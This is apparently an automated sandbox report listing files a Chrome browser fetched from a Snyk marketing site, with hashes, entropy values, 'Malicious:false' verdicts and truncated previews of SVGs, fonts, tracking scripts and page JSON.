                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:5T/xyggPv4qDs8yrImVLRDcrImVLRDtrImVLRDvxMVbWD3nh:BhrlVcrlVtrlVyu3nh
                                                                                                                                                                                                                                                                                                              MD5:645C26EA6768BC6149D40A60A2D56281
                                                                                                                                                                                                                                                                                                              SHA1:85A5811ADDA37E1245C92C9D2063E9B74AEBCAEC
                                                                                                                                                                                                                                                                                                              SHA-256:F212E44FF5675836B42E78C7DFD927B847B41A0EB56DF98EAB636B236E96F567
                                                                                                                                                                                                                                                                                                              SHA-512:D9CC6493E9A5327BE545FA8B8977D00F6EBA3AC13FCDEC02591D6F71AC723A677739709C9726B0E8C2B56FFD05E0CDA732DE8F62033A76A4B9C67BE6D1186899
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/snyk-mktg-brandui/patch/pose-alert.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg viewBox="0 0 516 451" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_8220_28736)">.<g clip-path="url(#clip1_8220_28736)">.<path d="M279.409 67.4032C279.409 67.2689 279.275 67.0004 279.141 67.0004C277.664 66.7319 276.456 66.8662 275.784 67.5374C275.382 67.9402 275.113 68.4771 275.113 69.1484V72.5045C275.113 73.1757 275.247 73.7127 275.65 74.1154C276.187 74.6524 276.993 74.6524 277.664 74.6524H277.932H278.201C278.335 74.6524 278.604 74.5182 278.604 74.2497C278.604 74.1154 278.469 73.9812 278.335 73.9812L279.006 67.8059C279.141 67.6717 279.275 67.5374 279.409 67.4032Z" fill="url(#paint0_linear_8220_28736)"/>.<path d="M332.839 95.8631C332.704 95.7288 332.436 95.4603 332.302 95.1919C331.362 93.9837 324.515 87.0029 323.576 86.1975C322.502 85.1235 321.562 85.1235 320.488 85.1235H311.359C310.688 85.1235 309.748 85.2577 308.138 86.1975C306.661 87.0029 292.297 95.4604 290.82 96.4001C289.343 97.2055 285.853 97.6083 283.034 93.1782C282.631 92.6412 282.362 92.1042 281
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9500), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):9500
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.361838920270885
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:j85B3yJdCE9r1dPZiDVGTtxRNs9lWzCWDFELiIh77fL4KL4vTfNhB:jawdC2BdPeOUDWzCOFELiIh77UzbVhB
                                                                                                                                                                                                                                                                                                              MD5:B2877DA906A3216C4F3FC4030B205E54
                                                                                                                                                                                                                                                                                                              SHA1:F7A612259BB345C70A1CAC073527E39DD5D8A0B7
                                                                                                                                                                                                                                                                                                              SHA-256:E779904E434D50E426E79DFAC680CDB8A04564E67121C257974278A02979E407
                                                                                                                                                                                                                                                                                                              SHA-512:428880BD5D5F63AF2E6A9354A6A500249E2A9EC96E5D3B995AEB9A467DBC075B255ACFFDB48A1A265273CFDFD25EBAB308D3B765BCCAD1C8BFF508947C19B866
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:if(!window.zitag){window.zitag={}}window.ZILogs={ziScript:{info:"",err:"",scriptsLoaded:[]},chat:{},ws:{},sch:{},fc:{}};window.zitag.SCHEDULE_BACKEND_URL=window.ZITagEnv==="dev"?"https://schedule-staging.zoominfo.com/zischedule.js":"https://schedule.zoominfo.com/zischedule.js";window.zitag.FORMCOMPLETE_BACKEND_URL=window.ZITagEnv==="dev"?"https://ws-assets-staging.zoominfo.com/formcomplete.js":"https://ws-assets.zoominfo.com/formcomplete.js";window.zitag.ZI_TAG_BACKEND_URL=window.ZITagEnv==="dev"?"https://js-staging.zi-scripts.com/unified/v1/master/":"https://js.zi-scripts.com/unified/v1/master/";window.zitag.ZI_WS_BACKEND_URL=window.ZITagEnv==="dev"?"https://wss.zoominfo.com/pixel/":"https://ws.zoominfo.com/pixel/";window.zitag.isScheduleScriptAlreadyLoaded=()=>{if(window.zischedule)return true;else return false};window.zitag.isChatScriptAlreadyLoaded=()=>{if(window.insentCompanyDomain&&window.insentProjectName&&window.insentProjectKey)return true;else return false};window.zitag.isFor
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):31202
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.967600662280177
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:B8J/cugXGUqofjhZP2rQlCNruH3XBMmBSg7tz7ej:BA/PghqoLirc3XKm8Cgj
                                                                                                                                                                                                                                                                                                              MD5:2A324835AB92FD70444C16AB58457AE1
                                                                                                                                                                                                                                                                                                              SHA1:CD3D2E701A52F5AB6529B439FCDBAA360EF9EE7E
                                                                                                                                                                                                                                                                                                              SHA-256:D9E960BFD90ECED67993F736141A28D11B01E0273EBBE46C667A0F9D7628A120
                                                                                                                                                                                                                                                                                                              SHA-512:AE277BC6284F9095122717DA5F4191047A6DA739B5A826939C3C2236E25DD0838F2A0D717A05FD0672C6D37B492C9AA3C32966FC8BDDECCEE975564886124B2D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg viewBox="0 0 1203 423" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><image height="423" width="1203" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABLMAAAGnCAYAAABM/RVIAAAACXBIWXMAAAsSAAALEgHS3X78AAAgAElEQVR4XuzdbWxc933m/evMGVqySomSk9pWBmsyfVG5WNNDKfarBubodlHcQaGSgRfbru1ETBtv0rpby7u2uwjqiq4LI5sENZ1u2uS2U9NJnE0fAlMVemcRVKuRm76SI5Ghgdh9saa8PbWTu4lFSZUfyDP/+8UZipREzm9meGbmPHw/gOGHuSjL5IjwufT7//6ec07NCvy941KtImlE8katPAAg79wJSVV5tZnS8vyslQYAAAAAi2eVWYE/vFMqHJI0IXmDDcMAAGzInZE0WQrnpq0kAAAAAGykYZkVTWK5aUkDG4YAAGiJOyP5E6XwVNVKAgAAAMCV1i2zomksb0oqHFznYwAAiIF7rBTOTVopAAAAAFjrqjIrKrL8qqTyuh8BAEBsas+Vwh9MWCkAAAAAWFFY+zcUWQCA7iocDPxbp60UAAAAAKy4rMyKjhZSZAEAuqlwMPBHDlkpAAAAAJDWHDOsL3t/wcgDANAZXri3tDw/a8UAAAAA5FtBWjle6KaNLAAAneMKU1YEAAAAAOrHDAuHJA00TAIA0FHeaODvq1gpAAAAAPm2sjNrolEIAIDuCCetBAAAAIB8K0S7srxBKwgAQOd5o0HxliErBQAAACC/ClKtYoUAAOga51esCAAAAID8KkgasUIAAHSPq1gJAAAAAPlVkLxRKwQAQPd4Q0YAAAAAQI4VBABAonhMDAMAAADYEGUWACBpBqwAAAAAgPyizAIAAAAAAEBqUGYBAAA
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):17818
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.010591760485862
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:h9fnA1pCYnzNckHLzv0Z60/9jnegW6PHvM5PK3wlMGXxnr1cr22V38bNtn4PlRK3:HnupCwf3vj0/oo+iar1crin4PzK9h
                                                                                                                                                                                                                                                                                                              MD5:CBD933EDF2C2DCBC907F628A543CC83E
                                                                                                                                                                                                                                                                                                              SHA1:AB4B426EA80B81531F6B7F54230A5744E21CD2D0
                                                                                                                                                                                                                                                                                                              SHA-256:1D01E0D3568325D5BBAEF2D60CEAABF47C0718AA35FA9980459A0C710552E040
                                                                                                                                                                                                                                                                                                              SHA-512:898AD480DAC0B96AB78B2E27F7BAC29AA82270D6B678A79E5A603CEE32C12564029D58C9BA4ECBAB517184C347A9EDF172A2EB17610BA53F96777EDA63664D63
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:./**. * @author Sanford Whiteman. * @version v1.2 2024-05-14. * @copyright . 2024 Sanford Whiteman. * @license Hippocratic 2.1: This license must appear with all reproductions of this software.. * . *. */.. const interestingDomains = [. "0815.ru",. "0wnd.net",. "0wnd.org",. "10minutemail.co.za",. "10minutemail.com",. "123-m.com",. "1fsdfdsfsdf.tk",. "1pad.de",. "20minutemail.com",. "21cn.com",. "2fdgdfgdfgdf.tk",. "2prong.com",. "30minutemail.com",. "33mail.com",. "3trtretgfrfe.tk",. "4gfdsgfdgfd.tk",. "4warding.com",. "5ghgfhfghfgh.tk",. "6hjgjhgkilkj.tk",. "6paq.com",. "7tags.com",. "9ox.net",. "a-bc.net",. "agedmail.com",. "ama-trade.de",. "amilegit.com",. "amiri.net",. "amiriindustries.com",. "anonmails.de",. "anonymbox.com",.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 960 x 502, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):102868
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.981268552045579
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:SOzF0gFmvslprI7o3ZYNGvL2agrY+ZfUOCOrBibOO2HDC3Kh/HgcRCh/ZCg1YLc7:n7gcHpvdgrpZfUOCcBiq+3KBguChELLg
                                                                                                                                                                                                                                                                                                              MD5:5F72BFFE3F8C315972106EA06B931C04
                                                                                                                                                                                                                                                                                                              SHA1:AA8303BBB39582FE2C39DB8F2330AEBEC2CD578E
                                                                                                                                                                                                                                                                                                              SHA-256:9F3E90A47247253693EBA17EB3E3E56D29D1177DC4C19CBA4FAD16BA2F279BB5
                                                                                                                                                                                                                                                                                                              SHA-512:6A7E650DB9595593C3663F7CE5159A29A5F72220FC8EBC6812737807A2185B02D3CA7D54D5C954B604F89BF1EFC5F394A1891CE184CBBD018AC5B9ABFC5D0636
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR................0....PLTE..a.....>..Z..z..g..V..^..r..j....B......E...........M..x.....p..Q.......@....L.....=..&.....:..... ..!...G.7.....%..?..4...4.*..(..'..1..%..........".....5..5..K.;Q....,Q..?..B.]....(U.m..|............>.$S..<.D..0{.7...N.G...5j9U{i.....f.x{....pHYs............... .IDATx...sSW...7......W.........<.J.1.I....Z..^..#B..-Y/.p..._.5{......;.....p.:G.......=9:.....r...../.|...s...............?O..>yr..#<.p......W..........M=...z.v......gx....|.\....9.....a..66~........o....?........C......{>..I..~...........8..&~..._.m.\..P.j.1>...m.I.*..b.F...d.{...../2|r,...._1.p...3|......S....CL.#..b"81..!.n.a...?.{.....d..%.....%.....r.....2~O.....^.u......@.]....!}N.V..b.Z..W0....;.S......B..)(.{........W.z,.Y.n.e'."...&....4.J......>9.:9Qv. ..a..0.0..e..=..;~.^A..%.g.0.,.{...@pO..[..z#......n...?y..P~...z...7.(...|.....9>..zI.U....+.e.f....'k.F......,...B...."......H..(F..cH.)...!.,?=.f...O..!.H..>.wo...p....v..<...
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):39131
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.955733109370803
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:iw/ARt09SIJmHZZHZB/+oDLJbMEBVA83Ft/u4Xgxq74qhxzaaUUHI6G6H:r2jxzaCG6H
                                                                                                                                                                                                                                                                                                              MD5:FDD0ACCE10A488D98C19936112AE4332
                                                                                                                                                                                                                                                                                                              SHA1:25BA5FF2BF8CB9E4D27F8508D273EB5794801284
                                                                                                                                                                                                                                                                                                              SHA-256:4BAAAE5B7B23B9E77FD0C2D11794B1DE3A08CDC0513BA678CF608A2942AAA890
                                                                                                                                                                                                                                                                                                              SHA-512:2239DEB178C6020A7072E47AAA19C6C85E10AA33648BEA0824530B12C50051591E513D4F87D311F55841922173AC72E8380A60E768D45D926338FC1B9DF99E91
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"settingsId":"Zz23KCbJ4","version":"77.29.180","isLatest":true,"buttonDisplayLocation":"bl","moreInfoButtonUrl":"","actionClickOnViewConsentInSearchApp":"","layout":1,"privacyModal":1,"urlConsentInfo":"","stylesCss":"","buttonPrivacyOpenIcon":"","buttonPrivacyCloseIcon":"","buttonPrivacyOpenIconUrl":"https://img.usercentrics.eu/misc/icon-fingerprint.svg","bannerMobileDescription":"We and our partners are using technologies like cookies and process personal data in order to improve your experience. In case of sale of your personal information you may exercise your consumer right to opt-out by activating the toggle 'Do Not Sell My Personal Information' below.","consentSharingIFrameUrl":"","bannerMobileDescriptionIsActive":true,"controllerIdCookie":"","chipDisplayLocation":"rm","privacyButtonIsVisible":true,"chipIsVisible":false,"disableScriptIfBot":false,"consentSharingIFrameIsCustomUrl":false,"consentSharingIFrameIsActive":true,"iabConsentIsActive":false,"resetConsentsOnShowingInitialV
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):226668
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.317943086064524
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:XmqIZl5phQk+VC+xyLRcP2QJ0roSjdDTtS223EM/LuJPj:mM2qQDTtSn/ihj
                                                                                                                                                                                                                                                                                                              MD5:182931EB99AFB01276B448D2F7BD627D
                                                                                                                                                                                                                                                                                                              SHA1:09112ACDC7C5ACD008FF83960E3C5C0D9FD32B56
                                                                                                                                                                                                                                                                                                              SHA-256:E96ABB18E70ACF14065E3BACB0DBD6942579A85D3D69D9D7551BEA9C627CA3A0
                                                                                                                                                                                                                                                                                                              SHA-512:8D326DEAF54FD6DC8A06A62BC271906B2905B0B9A2FA85956E3EA5A86454ECEDDFBE865DA6C28E9D124C173620FAD727F90EADC6C83E9312491A00692B5B4652
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/include/1729799400000/4479srg8vkz5.js
                                                                                                                                                                                                                                                                                                              Preview:!function(e){function webpackJsonpCallback(t){for(var r,o,i=t[0],s=t[1],c=0,u=[];c<i.length;c++)o=i[c],n[o]&&u.push(n[o][0]),n[o]=0;for(r in s)Object.prototype.hasOwnProperty.call(s,r)&&(e[r]=s[r]);for(a&&a(t);u.length;)u.shift()()}var t={},n={0:0};function __webpack_require__(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,__webpack_require__),r.l=!0,r.exports}__webpack_require__.e=function requireEnsure(e){var t=[],r=n[e];if(0!==r)if(r)t.push(r[2]);else{var o=new Promise(function(t,o){r=n[e]=[t,o]});t.push(r[2]=o);var i,a=document.createElement("script");a.charset="utf-8",a.timeout=120,__webpack_require__.nc&&a.setAttribute("nonce",__webpack_require__.nc),a.src=function jsonpScriptSrc(e){return __webpack_require__.p+"assets/"+({}[e]||e)+"."+{1:"37afe153",2:"2a722653",3:"ee35dea2"}[e]+".chunk.js"}(e);var s=new Error;i=function(t){a.onerror=a.onload=null,clearTimeout(c);var r=n[e];if(0!==r){if(r){var o=t&&("load"===t.type?"missing"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):18596
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.988788312296589
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:h5D5WUhNanar/Z19V6iGCYIqoPfHwfr13GPgqbrxremyFKKWB:h/NaOrBGCYIBPfQD1xqPhl
                                                                                                                                                                                                                                                                                                              MD5:C83E4437A53D7F849F9D32DF3D6B68F3
                                                                                                                                                                                                                                                                                                              SHA1:FABEA5AD92ED3E2431659B02E7624DF30D0C6BBC
                                                                                                                                                                                                                                                                                                              SHA-256:D9BADA3A44BB2FFA66DEC5CC781CAFC9EF17ED876CD9B0C5F7EF18228B63CEBB
                                                                                                                                                                                                                                                                                                              SHA-512:C2CA1630F7229DD2DEC37E0722F769DD94FD115EEFA8EEBA40F9BB09E4FDAB7CC7D15F3DEEA23F50911FEAE22BAE96341A5BACA20B59C7982CAF7A91A51E152F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                                                                                                                                                                                                                                                                                                              Preview:wOF2......H...........H=................................|.`..J.H..<........>..Z...x.6.$..0. ..~. ..)...%.m..t.D<...U.c....D....@........@e..a..R./<...p..q..q....S<.nm...X..(ER....e.....O.?Q_..FYH......ml.E..?;X0>.f.Y.,.n.a...._h8c.006U.cS..3.m.Or..I9..5.;.=..'!..c.O...W.K..f....k..&Xq..Y?.r...%.S..y.:q*.......u*D.d.R..'..Q,L.... e`..=?.{...e%{.....3+$.....NkF2...... ._}..2]....,.F.u.S4O.~w).G..../]}6.nVwKj.h@........5.7P....i..r........U?.........q..Cm......g...\.zu.....P..|....5G$...4k$..L..g..".y..?..6...O...e..@..0TYh..v........M.....#B...O.i.G$.Bq..m.A.s~...A...c.....25K.....B..<..w.A....G.O...A......A,y"q....q<....N..{Ta..!.|vzo.;9.5>.>....7I.i.Ld.4..y...].g.....'m_(...O-..}.K.(....R..2.q.z9.D..]..$.#$.:x..:{..m.OF...K[J. ......lpH.#%V....4.;l.<..J.6.T..a...I..|..zj.k.-...y...#..e.1,s....<.HX.....z{L....'.$. "..tY..m.<.\8P. a.......x.W\.b.%...RA.\.... M.......v1......#...............`.c..%.Nc.d.qP.68....$<.O.S_7...U.].jn>@.3.c..wO..>.>a.qg....\..kb.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):6151
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.145990881782335
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:ZK3AFOE5TXAxbzmBjGScaWaVaAIwlp+xO0AK5eVPNAvg/n/:ZKeVXARzmPVa9wlp+Y0ALaE/
                                                                                                                                                                                                                                                                                                              MD5:A16E2D1ED653EE8B964322708AD507BE
                                                                                                                                                                                                                                                                                                              SHA1:71288783C904E14B41CE98A691F00AFE200F6FF1
                                                                                                                                                                                                                                                                                                              SHA-256:8C797492718B60CEADEA625D078561328DA6CC0FFC49D41EEEE781E302C0104C
                                                                                                                                                                                                                                                                                                              SHA-512:FE54BA2C5CDE6B9917C97257534F8686EE1A4277704A3869A6B98E085F5A0B1B4B87F034E2957FC07DA9009E24DBCBA3E6DFAAC1A8058392D2AAD43D3618081D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg width="73" height="48" viewBox="0 0 73 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_8324_37137)">.<g clip-path="url(#clip1_8324_37137)">.<path d="M20.9612 17.7359C20.9612 18.6127 21.056 19.3237 21.2219 19.845C21.4115 20.3664 21.6485 20.9352 21.9803 21.5513C22.0988 21.7409 22.1462 21.9305 22.1462 22.0964C22.1462 22.3334 22.004 22.5704 21.6959 22.8074L20.2029 23.8027C19.9896 23.9449 19.7763 24.016 19.5867 24.016C19.3497 24.016 19.1127 23.8975 18.8758 23.6842C18.544 23.3287 18.2596 22.9496 18.0226 22.5704C17.7856 22.1675 17.5486 21.7172 17.288 21.1722C15.4395 23.3524 13.117 24.4426 10.3206 24.4426C8.32988 24.4426 6.74208 23.8738 5.58084 22.7363C4.41961 21.5987 3.82715 20.082 3.82715 18.1861C3.82715 16.1718 4.53811 14.5366 5.98372 13.3042C7.42934 12.0719 9.34892 11.4557 11.7899 11.4557C12.5956 11.4557 13.4251 11.5268 14.3019 11.6453C15.1788 11.7638 16.0793 11.9534 17.0273 12.1667V10.4367C17.0273 8.6356 16.6481 7.37958 15.9134 6.64492C15.1551 5.91027 13.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):383
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.797986511858187
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:t6AcA4Um49mc4slx5tR4xl4j4iiTMg9XksdJdtpkMMTlWOQcrtrNHQPBIUlVu2yr:t6Ax4S994QUMg90sdbkbTFxrNHQZI+yZ
                                                                                                                                                                                                                                                                                                              MD5:E117E5073615B6143B280F13AFB18F89
                                                                                                                                                                                                                                                                                                              SHA1:7F5C92EEAE789FBA0E233427120080686AED5605
                                                                                                                                                                                                                                                                                                              SHA-256:4B585099F3AB2E0FF961B2EB8FC6E04367611E1578BBD276CCF4CDECF3C98F9B
                                                                                                                                                                                                                                                                                                              SHA-512:8A3484279081A5211216DF3347BEF85C6A17E6F1E0CB33C4D875A0A4A3C7A16F4AE7376270D107A016272B43C2A2C36787392B32837839CAC75F04F06300352C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/snyk-mktg-brandui/backgrounds/wave-mask-hero.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 1447 3368" xmlns="http://www.w3.org/2000/svg"><path clip-rule="evenodd" d="m-.00006104.929688h1447.00006104v3217.100312 54.17 74.91c0 14.95-16.36 24.35-29.8 17.82-292.95-142.29-446.129-103.68-627.057-58.08-178.159 44.91-383.222 96.6-775.1321-10.98-8.63923-2.37-15.01096104-10.36-15.01096104-19.32v-6.14-59.48z" fill="#01011e" fill-rule="evenodd"/></svg>
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65512), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):69255
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.167982773149659
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:aZ7wixEDRhginYVRdWE39F0F9G3qzZI9rePorkC6q4mneC38JrERNFETEMVvpxlk:jmaa5uzCJVRNFuXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:06CF1D71C13CC71D928F6A0012A44F4F
                                                                                                                                                                                                                                                                                                              SHA1:FC332568FBF45D5293E598E3F13EE621F480B1C3
                                                                                                                                                                                                                                                                                                              SHA-256:CA0D325BBEC8D77CCC1C3C1C9DD920637C2968FC68702172DF0CE126B58D132D
                                                                                                                                                                                                                                                                                                              SHA-512:FDA7BA24FE35E47EC4F88482DC22AC48236162747BAAA3011FAB422DFD41225B5DB5BDE95F7BEB3B7E20D4E3F2F33BA2CD4BE27BA3DCEABB3888C5B02E2F0E7C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3MOxM4tPrMeuahbcCnIUgs","type":"Entry","createdAt":"2023-12-12T12:43:47.376Z","updatedAt":"2024-05-21T19:58:33.071Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":38,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Snyk AppRisk page","title":"Snyk AppRisk for ASPM | Manage And Prioritize Risks At Scale","slug":"snyk-apprisk-for-aspm-or-manage-and-prioritize-risks-at-scale","uri":"product/snyk-apprisk","pageLocalization":["de","ja","fr","pt-BR"],"featuredImage":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1701968319/feature-snyk-apprisk-logo-dashboard.jpg","tags":[],"type":"upload","bytes":115717,"width":1200,"format":"jpg","height":628,"version":1701968319,"duration":null,"metadata":[],"public_
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6880), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):6880
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.461505903428835
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:RNzZp3/0f/6yhL+M+ITH6HfEsFLtOL1/AWw1lB+fwtO44E:tl0HDko6HJFLtY/G3IYtNV
                                                                                                                                                                                                                                                                                                              MD5:2EC17BA5A94DEB05AE968A382FCD9B8B
                                                                                                                                                                                                                                                                                                              SHA1:BA1D9C39FB52A69E74E33B864020DD9C3AD2B13B
                                                                                                                                                                                                                                                                                                              SHA-256:BAF2BABE344E9647F19B8CC0172AD3CB78D8CB232C4816CBC4808B150B9F5760
                                                                                                                                                                                                                                                                                                              SHA-512:3C33F568DC75ACD2D35245FC1094D41EF35320A337A5EA42256A97ACA8A83E3A1561EACEAEECB6FFA29EB23E553175AA8044C4C856AC39A720D289D5BBDC84CA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/239.0fd23c525c8d868d.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[239],{50094:function(e,n,l){l.d(n,{Z:function(){return s}});var d=l(85893),i=l(45697),a=l.n(i),t=l(19026),o=l(44133);function r(e){let{children:n,description:l,title:i}=e;return(0,d.jsxs)("article",{className:"h-full max-h-content pad-extra-large bg-white radius-large shadow-far","data-component":"Form",children:[(i||l)&&(0,d.jsxs)("div",{className:"marg-b-medium",children:[i&&(0,d.jsx)("p",{className:"marg-b-extra-small txt-headline-small txt-color-headline",children:i}),l&&(0,d.jsx)(t.Z,{as:"string"==typeof l?"p":"div",className:(0,o.Z)("string"!=typeof l&&"txt-rich"),children:l})]}),n]})}r.propTypes={children:a().node,description:a().oneOfType([a().string,a().node]),title:a().string};var s=r},30239:function(e,n,l){l.r(n);var d=l(85893),i=l(5152),a=l.n(i),t=l(96098),o=l(50094),r=l(74129),s=l(86437),c=l(86943),u=l(50203);let v=a()(()=>l.e(6923).then(l.bind(l,96923)),{loadableGenerated:{webpack:()=>[96923]}});n.defau
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):111916
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.893380737291319
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:lqjf3IvHA5ADdfQQoJ0bscW+oheIDVeA8Bs659vVvYfnTlvNP4Sm3GqU:xdPLw9xGBT/YfnT5Nq3W
                                                                                                                                                                                                                                                                                                              MD5:E5267F1138DC9D64CA2971D3B48C379A
